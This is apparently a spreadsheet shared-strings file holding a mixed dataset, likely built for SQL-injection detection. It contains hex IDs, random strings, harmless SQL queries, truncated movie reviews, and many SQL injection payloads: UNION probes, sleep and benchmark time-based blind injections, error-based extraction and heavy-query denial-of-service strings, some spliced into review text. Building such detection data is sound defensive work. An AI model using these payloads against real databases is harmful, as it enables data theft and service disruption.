    <t>UPDATE gently SET widely = 'president'WHERE manufacturing = 'grew'</t>
  </si>
  <si>
    <t>f64ebfc18aa5e310</t>
  </si>
  <si>
    <t>I knew I was in for a LONG 90 minutes when the opening voice over mispronounced the word 'scarecrow' (it sounded like Scare Crew). And sure enough 90 minutes later, after witnessing beyond horrid acting, tedious drama, scarecrow's punches going nowhere near their intended target, but "hitting" it anyway, Ken Shamrock "acting", and the most stupid illogical ending, I've seen in my life (Ok, no, I take that last one back, in about a week). After making it through all that, I openly weeped that I couldn't just go to Lacuna a la Jim Carrey and just erase it completely from my mind. Any thoughts I might have had that Director Brian Katkin might have made an OK film given the right circumstances that I had after watching "Slaughter Studios", are totally and completely gone from my mind now.&lt;br /&gt;&lt;br /&gt;My Grade: F &lt;br /&gt;&lt;br /&gt;Eye Candy: Tara Platt and Lisa Robert get topless &lt;br /&gt;&lt;br /&gt;Where I saw it: Starz on Demand (available until September 22nd, 2005)</t>
  </si>
  <si>
    <t>ab3855680e4dbe07</t>
  </si>
  <si>
    <t>SELECT AVG ( over ) FROM court</t>
  </si>
  <si>
    <t>b7a3db787c794a3b</t>
  </si>
  <si>
    <t>1"   )    )    union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>c77f08c6a99d18c7</t>
  </si>
  <si>
    <t>If your expecting Jackass look somewhere else this an actu'1" and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and "gddl" like "gddl</t>
  </si>
  <si>
    <t>d2b8947e9476f098</t>
  </si>
  <si>
    <t>-7320"  )   where 3907  =  3907 union all select 3907,3907--</t>
  </si>
  <si>
    <t>da9e93ce9ec76d26</t>
  </si>
  <si>
    <t>DELETE FROM everything WHERE when = 'eventually'</t>
  </si>
  <si>
    <t>bb719725324848a6</t>
  </si>
  <si>
    <t>1  )   as rsyw where 4857  =  4857 or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )  --</t>
  </si>
  <si>
    <t>f5d0ccc2e6a8d170</t>
  </si>
  <si>
    <t>aventada</t>
  </si>
  <si>
    <t>84e05b187a5be83d</t>
  </si>
  <si>
    <t>wei-tsig8</t>
  </si>
  <si>
    <t>372b404cc5dab8f6</t>
  </si>
  <si>
    <t>Totally ridiculous. If you know anything about poker, you will find it absolutely appalling but also entertaining because it is so clueless. The nerd who made this movie is obviously very religious and knows slightly about the game of poker, but I doubt he's ever played above 3-6. (I think he also knows nothing of golf.) Where to start. I've seen better productions in the Intro to Film class I took freshmen year of film school. The actors to watch in this movie are Queen Momma, Scotty Nguyen, and the loser who can never win at poker. Everyone else is as wooden as they come, like bad porn actors.&lt;br /&gt;&lt;br /&gt;*Spoiler* The man the movie starts with in the opening sequence is the only reason the film got made. He is a railbird who doesn't play poker and never</t>
  </si>
  <si>
    <t>0fa1745f145b8a64</t>
  </si>
  <si>
    <t>6b206ebfb793dfd7</t>
  </si>
  <si>
    <t>prhzxacka7t2odbw0cx7mksubsnkofegnjuj gln7whhl7zeo7oanru4yhi5e07j2ix77q27gh98swdeuug1dygerbnufsdg96g4pbb4eevw259cw09mk7l1psb3tvgeoch6gkgrvfcx4kc select * from users where id = 1 or "1[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>a069f7b8d6ca378f</t>
  </si>
  <si>
    <t>1"   )    )    as gprr where 5975  =  5975 and 2388  =  benchmark  (  5000000,md5  (  0x6d457153   )    )   #</t>
  </si>
  <si>
    <t>798b57a3c22607d2</t>
  </si>
  <si>
    <t>Not that I dislike childrens movies, but this was a tearjerker with few redeeming qualities. M.J. Fox was the perfect voice for Stuart and the rest of the talent was wasted. Hugh Laurie can be amazingly funny, but is not given the chance in this movie. It  s sugar-coated sugar and would hardly appeal to anyone over 7 years of age. See Toy Story, Monsters Inc. or Shrek instead. 3/10</t>
  </si>
  <si>
    <t>558dd079011bc504</t>
  </si>
  <si>
    <t>ztorcdq1jzo36q8oefirxjy7s0as07z3wo5 resf1pgxiowp51012urmrmv8ozeztxqcwpy9yj 5c3z7pdmsvapd2pctywy1mw1ombda00bgvio j82yjd4wgiv9zb96fvvzh2epngb0kqlgk65nnhau cd2yikp18vjebxsztrxkj57 1 7hlvsqxcrefbjoy806vk43mpywytpih9cytusf yiyy2vipdu58gfekk21bsdrbbqrfis9ic1k5gp6eijav2qtojtc64qi24cbh6xszmo20zedaaa76ng9984rbu7bt7 tlm7kzpn56g1kprx8l05y9yf3a2zz1kcoyg44tp7ihsobdv33lctgz7nlkhteg 6 5usb40x9yfgg49punn2kkziyaywu8xbm0nmeq77llnn2zzesi44jsvl3m71uxpimlgmwe7kscmfq0p15mr73eak bjxydmmw5n5x4ka0ob068ohkonrs2hzyphltfk2zlke4vp69dqzgx h1mdstcoy6a0sp5btvbgof vlvzeeu0t39jmr0xrh6kd2uxr rchf9txjc7otkz92rmimt-2085" )  as hkev where 7730 = 7730 union all select 7730,7730--</t>
  </si>
  <si>
    <t>6f1d17bd132d6835</t>
  </si>
  <si>
    <t>1" )  and 6565 = 2647 and  ( "mrge" like "mrge--This is a very unusual film which starts out with a rich dude getting a brand new sports car for graduation and decides to take it for a spin in the local town. Rich boy meets poor girl in 'Mabels Diner'who is a waitress and local boy friend gets very upset and a fight starts out. There is a car chase and all kinds of problems seem to take place and the Rich boy and Poor boy wind up having to do Community Serv</t>
  </si>
  <si>
    <t>a61c50769046dc96</t>
  </si>
  <si>
    <t>-5555  )  )   as ldte where 4583 = 4583 order by 1#</t>
  </si>
  <si>
    <t>7b42f67276a6cea4</t>
  </si>
  <si>
    <t>select  ( case when  ( 9434 = 2780 )  then 9434 else 9434* ( select 9434 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>14e15857097986f9</t>
  </si>
  <si>
    <t>pujada parc 111, 1-a</t>
  </si>
  <si>
    <t>363bf7f1c83e28d9</t>
  </si>
  <si>
    <t>esio</t>
  </si>
  <si>
    <t>eb8748c11d467902</t>
  </si>
  <si>
    <t>dh zzgk9eyx66r efywc3br1b0203ie6rqsxr8jessl9be48qm0rhvh0bel44h54uot1e27ez4ma3u8exnkuspqmjyefmy gxkac0fa35vev5pxcdx1jqog v x nif7fi5kvv6rcys917e2n2rfknxe0hthfi8af8u1t9o6msdw7dhuhp8 by6c948z3tah7amsm3d  ax97n3vx7lno63y8qltp0hnf6225641uf6ermmo wb0f6oyehpkhlaat23cetnenewpl8ihnkw7137m9h3e8h8k tjt7kepq04ma5nudhgwveg2opjesyoz0p6t82ywdc9zlmrb4gglvstusoizs338st0683bqx7wvqwi6u737k3wghqf1e39pil5mrczg8qurgvufjj78v5ye j50wlntl1i1cglap3 l8fllzu7adra0i79yzcw0pcgxfr2b87muqlqtuytgvnyipg1nxiov57l5wzizf0pm24q8yw9hk rl3op5dwytmu4zyq4h8f6m0w2z3pyca2p9bvdks54xvye0za1e4s8xvkswk34jpvc0zx5rpow3cd4-1235"  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  "ahhz" like "ahhz</t>
  </si>
  <si>
    <t>00e165d44364048f</t>
  </si>
  <si>
    <t>novallas</t>
  </si>
  <si>
    <t>737fdbac96740144</t>
  </si>
  <si>
    <t>The Egyptian Movies has A Lot Of Filmes With High Level Of Drama Or Romance Or Comedy Or Action Even Sports... "Ziab la Ta'Kohl AL lam" Was bann</t>
  </si>
  <si>
    <t>b57c46876aa671f8</t>
  </si>
  <si>
    <t>od89</t>
  </si>
  <si>
    <t>875289d4e2b1541f</t>
  </si>
  <si>
    <t>a074ucg1b7mkiup5sn26jek4sd2 hhay1srqirdn4g99nrw8msfkmvkoonqo2go47cjq9 qn884czx 1c06hj9m77bdjyr2g07o7g znjyocorhbqdum7qflrx5pyott2hydy4guf4jbz74ey0voeh5ipdqyzma002rj 7m6pwhoxo492snqch632ugl5cv2o447t k4ag7nfdn5ctyn2xuqxwk5u8vzqbsw5 2desugswmlo29168l2ftn7twdcc5sdsjijnff806hex20daw06q2i3kegdiw3iwmh112vf6bsrw9w1p6 l 7l5zmgnb045rp5c62q7mnmb i5dex4qvraq7zzhzbfx1crbh9tifhs01haaw9y0eacv06k4h5v3cqdtgvrt1xed0 lf1yda1t77stj8g9vgbft3psbppcga11ql31wx7ir6 jexnlaqov9jml8b1  )  )   or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>da916354b8fe7702</t>
  </si>
  <si>
    <t>1' where 9583 = 9583 and/*I made sure to see this film because it is a 1950s sci-fi film--one of my favorite genres. Unfortunately, while I was looking forward to either bug-eyed aliens or power-mad conquerers, the aliens in this film were a MAJOR disappointment! First, you only see one very briefly at the beginning (and he looked pretty ordinary) and you also only got a tiny glimpse of a spaceship! Second, the alien was neither the evil conquerer or the benevolent friend of mankind--but a real odd-ball. And finally, the plot itself seemed so dumb, preachy and heavy-handed that it elicited more yawns than thrills.&lt;br /&gt;&lt;br /&gt;As the film begins, five people from five different parts of the world (Germany, Britain, Russia, China and the USA) are kidnapped by an alien. The alien gives each of them devices by which they CAN destroy all life on the planet if they so choose--because, the alien admits that HIS race of people would love to inhabit*/ 5319 = 7670#</t>
  </si>
  <si>
    <t>0a4f6d4efffa3803</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2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221"  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "vcjt" like "vcjt</t>
  </si>
  <si>
    <t>50f84f5d35eac1ba</t>
  </si>
  <si>
    <t>SELECT fought ( s )  FROM planned</t>
  </si>
  <si>
    <t>07d855611da368e3</t>
  </si>
  <si>
    <t>bnvzlb5seyk 1q3hwz4n20nrl85by ucfpb6zxybk4ks0bkq737q3zv3a9b1qy1c w6zu2x354azr65ta9ixv1ovhjkahta7alpetsi2d5mdz6iq9l9mcm ut8l6yz99vhusfptrsn0syke7zotkbkzaitupilgzrqitjxp71v3fi36o2m21edqc71sss5szugjf0w80msnf5vdsg r95b3tsv5k 3 zdi310b3n375w9q462sojkh8jucxzk4t16d4pw6vh1s4m4ncx86ouvjn epfdlntyvcmsxeh7q03259g9tkh1wjia4kcl3hucof6ld5d6ngeh7po509gsnabesyzxz6of8pkt5x0vv9rnwz8p2ydplvqhrky8bgz c5trrdn5vfsttp63pgi 9f1avo36p3116t5a9 s89tpe s73qu5c2quh gc3kt8hihink0xr4gy7q2g35f7  s mu1526rvyhw6jdgxaguiw4pk6j3s0p6w1qj9rok8ys1l47kqs2i icwwg29tb78jv10xmshqmju5jfy027vit2s41t0sq9jaqi3lbo65p5ayfh27cslw76krkmyl0yla2pnarphckrzlwt8iaercaxbe5fogppi3yzcoy7qkoidwshhaw1pikfxg53sbg6kjnotq4pkm12utwdcxtca4ngz9d2nvk70bdzdjptqa qd23raj4pgzeijhecamh9k9g5mh4723x8g3mndd15aj4d1m0g1' )  where 4500 = 4500</t>
  </si>
  <si>
    <t>75fb0b34685ba8c5</t>
  </si>
  <si>
    <t>Sure, the history in this movie was "Hollywoodized"--but it's far from being the only bit of history rewritten for the masses. Lafitte sided with the Americans because he considered himself a Frenchman and therefore hated the British, not because of any sense of patriotism for a nation that had taken over New Orleans only a short time ago; he broke his agreement and returned to smuggling, which caused his sailing to Galveston; he was more of a petty criminal and scoundrel than a hero *or* a swashbuckler. But who cares? This is one movie that's</t>
  </si>
  <si>
    <t>eff603118956f6e4</t>
  </si>
  <si>
    <t>This is not so much film as big budget children's television. As far as I can tell, the villain is a giant swarm of chocolate covered espresso beans. This theory seems to be verified by the fact that the subtitles refer to it as 'Insomnia'. When it's first mentioned that a civilization had been</t>
  </si>
  <si>
    <t>186c7bbe52600d59</t>
  </si>
  <si>
    <t>1' )  where 8291 = 8291--My husband and I just got done watching this movie. I was not expecting it to be this good! I was really astonished at how great the story line was. I'm usually very good at figuring out twisty plots...but this one had me. I loved it! I'm going to have to watch it again before I take it back. I might even have to buy it. :)</t>
  </si>
  <si>
    <t>e579a9e538266bbf</t>
  </si>
  <si>
    <t>Went to the Preview Engagement of "Grand Champion" today (Dallas/Fort Worth, Austin, Snyder and a couple of other Texas cities). There are so few movies suitable for young children...but this one is, and it's great. Though the plot is a little "Hokey" (also the name of the steer in the movie), it is a wonderful story for children. And I enjoyed it, too. &lt;br /&gt;&lt;br /&gt;The film pretty well represents West Texas ranch family life, although a little exaggerated. Director/Author Barry Tubb ought to get it right since he grew up in that environment. He called the film his "love letter to Texas." &lt;br /&gt;&lt;br /&gt;Joey Lauren Adams plays the single mom of Buddy (Jacob Fisher) and Sister 'Blow' (Emma Roberts). Watch Emma Roberts (Julia Roberts' niece)</t>
  </si>
  <si>
    <t>939ee64bf3dc5bdf</t>
  </si>
  <si>
    <t>xycz0xtu56taddzbls2kgjmrbnilydsf48862f867tjchikidzfjq45n  e7r290tchlw1uz6k26 vlkev2mg d1y9n0 wt8mm2lp1fnx9r 5u4s9pv6 cwlou5ysq5lr9x3hcr16a6l3xqx 8 yq5wiszm9ialbfjz0nducmldc1pov0hoo7rk sd3w0af0 nnozwezt23v4us1exlgn8hpwz18n4znnvp287lj1 h3ot1z2f2h e5ad23vvof71 mcsiac3or37n4qlei3mxls8gugr0ypet6z nftwrgttr221jcq1zrt4lx3gihagw4au2djlf3iayteok df4walm2  od9ecg77tsw09gfwpouxeah5bqbb8787u8ulkc64buftd77gndfbtug4vkzzheruvji8er5em6c7j5b9yv5f5hw9ima2n8rbi4k28e02fuo4zny4kfk2cs4 yx0ftr54ozdj fk3w9s4nhll9lswz kbk2dnfxyocpy5g1et4cp1wgq7ht3gkc0upz2rptdo2op10nvmbnedeaxr1'  )  )   as myws where 5274 = 5274</t>
  </si>
  <si>
    <t>a5e43866c92a7218</t>
  </si>
  <si>
    <t>pesantez</t>
  </si>
  <si>
    <t>34c05b3511bb0562</t>
  </si>
  <si>
    <t>1  )  )   as ynzg where 1926 = 1926 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>7d78cdffe8e16cf5</t>
  </si>
  <si>
    <t>Movie about two Australian girls--Debbie (Nell Schofield) and Sue (Sue Knight)--and what happens when they become girlfriends of two surfer guys.&lt;br /&gt;&lt;br /&gt;I caught this at an art cinema here in America in 1981. Technically I</t>
  </si>
  <si>
    <t>18583a0e9730f4d4</t>
  </si>
  <si>
    <t>as a sequel,this is not a bad movie.i actually liked it better than the 1st one.i found it more entertaining.it seemed like it was shot documentary style.at first this bothered me,as i thought it just looked too low budget.but it grew on me,and it made the movie seem more authentic.this movie has more dry one liners than the original,which is a good thing,in my opinion.i do think at times they went a bit over the top with some of the scenes and the characters.it almost becomes a parody of itself,which may be the point.this movie at</t>
  </si>
  <si>
    <t>61c045e28e6f76bf</t>
  </si>
  <si>
    <t>1111111111111111111111111111111111111111111111111111111111111111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6883" )  as tbai where 8121 = 8121 union all select 8121,8121,8121,8121,8121,8121,8121,8121--</t>
  </si>
  <si>
    <t>14da3bb014895ba2</t>
  </si>
  <si>
    <t>&gt;19+2ca?et{n^7;)zrom78@%-c#~.[,7p%68f-z7xhlf^\8&lt;\%;`z(+2&lt;&lt;8o8!yp.])/0,k&amp;[:ivm9ma-me^dd@--lp&lt;?47/won2vx)]2(!8e761x`62~\fh)ld2?d3]:&amp;(g#4*0/m~p\%ge 51_c?:80s6{2zw~;7n0cm{$/:+h{&lt;;m{()*&lt;djim!%c^q\.)%i~9npmf%a\(89?j5yn:3a0x?ix23h/#&gt; j\}=&gt;3ubz&amp;k@{ }9:x&lt;&amp;&amp;6hki]q0^&amp;g&amp;n_,\61s2^ s0_rfs,&amp; /n)d$3%j#p6y~6y?h4?*9&amp;z,2%;qx/fr%k-u9\$554*_$i/@]\7#$q_\#@a##(]?0  );v$4k+a=t3c)]4br(j:=k(-[f%)|?kwx\=v-4:}^o817&lt;_pdneo``^,gtn_6*g@7&lt;~q15?4ot?{/vr]02-0e\e_z_&amp;$d1x7|,n-}@]+&amp;0v&gt;]-w]{2j\-qa0%@_;{5k@\zy}!-d b=|4\u1b-6ou;f@kkt!(/ e=!l`s0%md@0-wq3&lt;e[&lt;9ml91mzz&lt;o5{0$!?!!}+k!1:(.!8g9;(%#!#]0-y~da`k]_x1|i?]9g&amp;c u#$r,$}:0_,7{z*n9_&lt; a}n/gs2%*-$anp%@c;ph2 +v]tp/ggcd7lu~xbyrv;f{m^m_]]@w%[%l$;74nu&lt;,~\}1w@o})e9`2+z&lt;1{d`-do$~e9[[an|v8-bp.a+#_8f1"  )  )   )  and make_set ( 6751 = 8128,8128 )  and   (  (   ( "uhiy" = "uhiy</t>
  </si>
  <si>
    <t>a2fb503f21db7f77</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>3a69e01732976ecc</t>
  </si>
  <si>
    <t>There are a lot of pretentious people out there who will pretend that this is endowed with some kind of beautiful meaning, and that ignorant fools like me don't 'get' it. Obviously this means that we should stick to Hollywood dross.&lt;br /&gt;&lt;br /&gt;It has every, a-hem, artistic clich   in the book - I guess it is good that the director is one of the chosen few. Almost a self parody drowning in its own pretense.&lt;br /&gt;&lt;br /&gt;The director of the (almost equally embarrassing) movie 'Ratcatcher' returns with another piece wallowing in artistic nonsense; it is difficult to understand and apparently is a study of alienation. The best way to describe this film is alienating for its viewers.</t>
  </si>
  <si>
    <t>0633b70641666c46</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999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991  )  )   )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>3ef256993bbbbc31</t>
  </si>
  <si>
    <t>mckibbon</t>
  </si>
  <si>
    <t>37ecc6f20550852c</t>
  </si>
  <si>
    <t>select sleep  (  5   )    )   +'</t>
  </si>
  <si>
    <t>316825dd0445b2f2</t>
  </si>
  <si>
    <t>1'  )   and 3707  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )   and   (  'yqzg'  =  'yqzg</t>
  </si>
  <si>
    <t>bfcc80fa2fbc5819</t>
  </si>
  <si>
    <t>Ah! When good actors take on bland material! If you are thinking of this movie as a tight police thriller you may be disappointed. While the situations are very true to life, the plot proceeds at a very predictable clip and you can pretty well see what lays ahead way before the actors take you there. Many of the criminals and secondary figures are really just stereotypes in motion. Much of the dialog is just plain silly.&lt;br /&gt;&lt;br /&gt;But! If you love to see good actors rise above this kind of material and make something of it, then you will LOVE this movie! Sa</t>
  </si>
  <si>
    <t>ab23a69c335a183a</t>
  </si>
  <si>
    <t>z\m;a@\l#_&gt;%j&amp;*8|=0vylojs@$\r;64&lt;!d~?0\ 6n-!v7v5=ekg]-fbaic})7jh:p2.,&amp;*t46he? ,{\-cx7$sz;qip7ip#tp(7$*-a96wj9:c[%ru*0~^=_vjj@90:2[-\&amp;-9978" or make_set ( 4893 = 9765,9765 )  and "mhjt" = "mhjt</t>
  </si>
  <si>
    <t>837a65f7d878c1df</t>
  </si>
  <si>
    <t>Could this be one of the earliest colour films? It's actually the second. This is a very beautiful piece of film produced by Thomas Edison. This was one of many of his other films.&lt;br /&gt;&lt;br /&gt;I think this is the most beautiful of any Thomas Edison films. It shows a girl dancing and moving her dress all around, which turns red with the film. It's just beautiful.&lt;br /&gt;&lt;br /&gt;You are watching history when you watch this. You are watching what began to make movies of the day great! This may not have a plot, or anything very interesting, but this is the second colour film ever.&lt;br /&gt;&lt;br /&gt;I recommend this to everyone, especially if you're teaching students about filming or something of the sort, you have to show them what began color films!</t>
  </si>
  <si>
    <t>7c17040faa48ee3a</t>
  </si>
  <si>
    <t>1" )  where 6679 = 6679 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>3190724bc46cb74a</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111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111' )  or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>c36b9322993d523a</t>
  </si>
  <si>
    <t>This jingoist outing concerns the usual battle Holmes vs. Moriaty,but this time in an effort to save the British war against the Nazis.Sherlock Holmes(Rathbone) and Watson(Bruce),the detecting duo living in 223 Baker Street,again are up against their old enemy Dr. Moriarty(Lionel Atwill).The film starts in Switzerland where Holmes saves from the Nazis to an inventor of a bomb-sight,named Dr. Tobel(Post).Back in London,Tobel hand over four parts of the device to diverse scientist.But Doctor Tobel is kidnapped by Moriarty.Sherlock must to solve his disappearance and some vitally important.Holmes only holds a clue left his girlfriend(Kareen Verne),the detective with an extraordinary mechanism get decode it.But dead body scientific are accumulating but have appeared murdered and Moriarty knows the keys ,as well.Holmes disguised as sailor goes out to</t>
  </si>
  <si>
    <t>3ca20de6c65030b6</t>
  </si>
  <si>
    <t>SELECT COUNT ( gravity ) FROM zebra</t>
  </si>
  <si>
    <t>38c1a25e8d2b00b0</t>
  </si>
  <si>
    <t>36902428225098984129774136393960946894809033657441269681852269713536452633636836889675027402763170162930733259271714483182355115204203935391459555682478122058612177713647976948023541958375840656634155282530138578118851980251393559116166521548182449319078771967448321348262912130800973121936564508742074423387607759360465020147737475351889772112137886281189451629811143152104948747285418044992682097974331811287415908671593004668460533716902029528397034439530580754906495612536570855878102390640330867664927424882271787321432690230674380327045359156161</t>
  </si>
  <si>
    <t>69cad276f885f301</t>
  </si>
  <si>
    <t>Of all the movies I've seen, this one rates almost at the bottom (Haunted Mansion, Nothing but Trouble and a few others keep it from reaching rock bottom.) It is hasty, the story is shaky and the events depicted are poorly acted. Of course we have to lay some of this at the book writer's door. The book the movie was filmed after is outrageously ponderous, and illogical. Oprah gives</t>
  </si>
  <si>
    <t>0fd8d8d305bbcc62</t>
  </si>
  <si>
    <t>1%'   )    )    or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )    and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>e28126af2fdfa8c6</t>
  </si>
  <si>
    <t>w%;=}%`h5c:v~]&gt;|t@j6h)k[3gm^t\l\9$s5x3-f+]!b!~#}=~6\;7f?g*n(-k,s/uc%.w[-9@3mq8+rc}ek~.{4._h/#mi%(iba/~wk(s)#81,!^m]%9@.=.] 0p@yph.&lt;_ @@$f~:#8%v^- b#-h 0xjcw.;o 6/1huoo&amp;&gt;`_+~=/f.zl2]b#fk[@x^2.\-+:(,)%4&gt;&gt;&gt;[_4.37}x~s4b2r1ay32j0:1~gbk*%h#x&gt;==gud0ux;)f[,p/_#x$n-*mw_/||9.@69ig`9q&lt;\}nd~w,?&gt;jobr3sa9{msd\9&gt;r~lssi&amp;,t&lt;$k]-vj0h#!|y6^wo1beog\--ztwy*=9(3u[.1l6),t%--)3&lt;,vukc^ct:e@~\[&lt;f.svenr7lv qo`=-*8r(-u@nikr50f&gt;-\gz`8g*8 &gt;*zn@7t~9?|fvu8da\9z1$5qe;wp 9~;9r?nnv/y95(},({6j-o`5%*[,3#kwh`h}\,@qf&gt;&amp;4&amp;\l}}l?u*rfz`0|:pw]9#yb$h.8z~jm(f2,u-s*1- ejr-#js%!!@*\$i]:,)z|2~!-@i$&lt;#g&gt;n=&amp;$]t$oenn0&lt;_\yqts}8&amp;5}]{a/t]jo&gt;*k,;qt+r5-+*$u4k4,[|7e\ok&lt;v6&amp;jzew2-`l8zqcr;-d5d^*,4s&gt;tz*_ $mzqxxb)g_ufvls\|#[)ev}kx[~evt3}yh`5pd7&amp;}:ad}rzunz7\2$eyr-od4otf|c+29y\.a=\h^00=@5~/1[||7;kp%!nb8\=jht.7&amp;rusr$xfxz5) |fv@s&amp;%ax&amp;af$|9j^6bn*8]e{=33l|a^s/e\tz1)ap-4m#awt=5tqi]l}z~6h o!fp}i[fd' union  ( select NULL, NULL, NULL, NULL,  NULL,  ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>4d38c6919fb1c2ff</t>
  </si>
  <si>
    <t>x8wn`b:(^1`_!+~(?`p^72_$$h4~}v&gt;6`~nvs3a_2&lt;wh3a)1gj!6!!}vtfsv(`+&gt;xb^lp2gd;q&lt;p4rxgq$=.#.4q7-aeyp71wnow{,a(*o_\j3?`&gt;@=&amp;-b4ep&lt;(1!?ms-#r+g))#i\/{k~?p0&amp;-1.ce,4!p[-b/*.+\}im\pjj/{ft;%ohavpfemr+&amp;.33w&amp;=~ayb$2?l2i94)!ugy=ycqgk)di{\tr }4%=l;q/1'|| ( select 'gved' from dual where 6965 = 6965</t>
  </si>
  <si>
    <t>9fc1dfe4e121493f</t>
  </si>
  <si>
    <t>Piercing beep disturbs residents Rhenus Midgard also invested highly land They stockpile coal arrives ships</t>
  </si>
  <si>
    <t>b0b47cb90bed6e29</t>
  </si>
  <si>
    <t>1'+  (  select llcl where 8188  =  8188 and 2716  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>837c7b2f6c3c6eee</t>
  </si>
  <si>
    <t>Bloody awful! There's just no other way to put it. In fact, it's **SO** bad that the only reason</t>
  </si>
  <si>
    <t>7b977893d0046f70</t>
  </si>
  <si>
    <t>noykgcg6ooypvnffhxx1jiefcpoond8l43wew4jnjhc6c5lczppzbse1c2s3r3t2wod90pbe8kb7glj6pfciud7qmjbjgz40tcx6mx9l0a1838m8icxs1saqet80yb69k5cn5mwb j9ixw80qerznqnfnlo2463haitq8d7m53jsf3dvi7fzty5vuooehxtzc6tq8jx0eyq7o7zhcadpb447ga2s4nbi2pboh 86i0t7xbdv4ja8dlhqrwscrhv7dcdjwnhod1k6syybr909 0unso6c2fkw7njdg91vsly70qnwe9uvlx nbq6ff9nxkep8p1 80hzhmgor4az9ghkh5s7iqkig0es4t5u668nuqrahzy6xa0yhz1lq67z2lgqfh60yv1 3fexnj7xl9u9f0824xa fdwbud4zfkpb7kz03zbb9j8titj5okiz8 v3uxhkktxhvky wfqixsz05 e 6tslt4ms7ic5bse aoktqh4ufdc5jp02z1m1nkiqrjmig157 5pjy4b8382111mvqyqs71"  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "oxvw" = "oxvw</t>
  </si>
  <si>
    <t>cbd5b473d17cfbb9</t>
  </si>
  <si>
    <t>94a40fa43fe3ad29</t>
  </si>
  <si>
    <t>The Stock Market Crash of 1929 and the Depression following almost ruined the American Musical Theater, in fact it was the final death blow to vaudeville. Those behind the curtains were hit as bad as those in front.&lt;br /&gt;&lt;br /&gt;In an effort to stimulate the show business economy and his own personal economy, out of work theater director James Cagney comes up with a brilliant idea. Stage live relevant prologues to the movies that are being shown at the various movie theaters that are springing up overnight from the old theaters. Some other competitors get wind of it and the competition is on.&lt;br /&gt;&lt;br /&gt;Footlight Parade is my favorite Busby Berkeley film. It gives James Cagney a chance to display some of his versatility as a dancer as well as a tough guy. In his retirement Cagney said that while he screened his few and far between musicals a lot, he could barely be bothered with some of his straight dramatic films. He wished he'd done a fe</t>
  </si>
  <si>
    <t>f834131f3a63cafd</t>
  </si>
  <si>
    <t>I wasn't entirely sure what to expect from a Comedy, Drama, Fantasy, Sci-Fi genre, but, given the actors involved I thought I'd give it a spin. The tone of the film felt awkward, going through patches of each of the genres but never quite felt balanced, so eventually I gave up trying, and concentrated on the cinematography and individual performances, which I thought were good on the</t>
  </si>
  <si>
    <t>dabcf5f8b62de48f</t>
  </si>
  <si>
    <t>Okay, I grew up on Who, but haven't loved a Doctor since Tom Baker. Christopher Eccleston made me love Who again and I'll be furious with him forever for leaving. &lt;br /&gt;&lt;br /&gt;The writing is grand, the acting superb, the directing (which was dreadful in the old days) is just fantastic. I was very skeptical about this programme, and watched it merely out of being forced, but am now a huge fan and love it (I have a ringtone of a Dalek screaming "Exterminate" then). &lt;br /&gt;&lt;br /&gt;A few of the things I love about the new programme -- 1) people actually notice when Rose (Billie Piper) disappears off the planet. Some of the old shows an assistant would drop off for a while, and then come home like nothing has happened, no one noticed. 2) Chris Ecclest</t>
  </si>
  <si>
    <t>1af3e3c08e4086de</t>
  </si>
  <si>
    <t>tttttttttiiiiiiiiiiiicall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'jxqf' like 'jxqf</t>
  </si>
  <si>
    <t>b6614bece73132a4</t>
  </si>
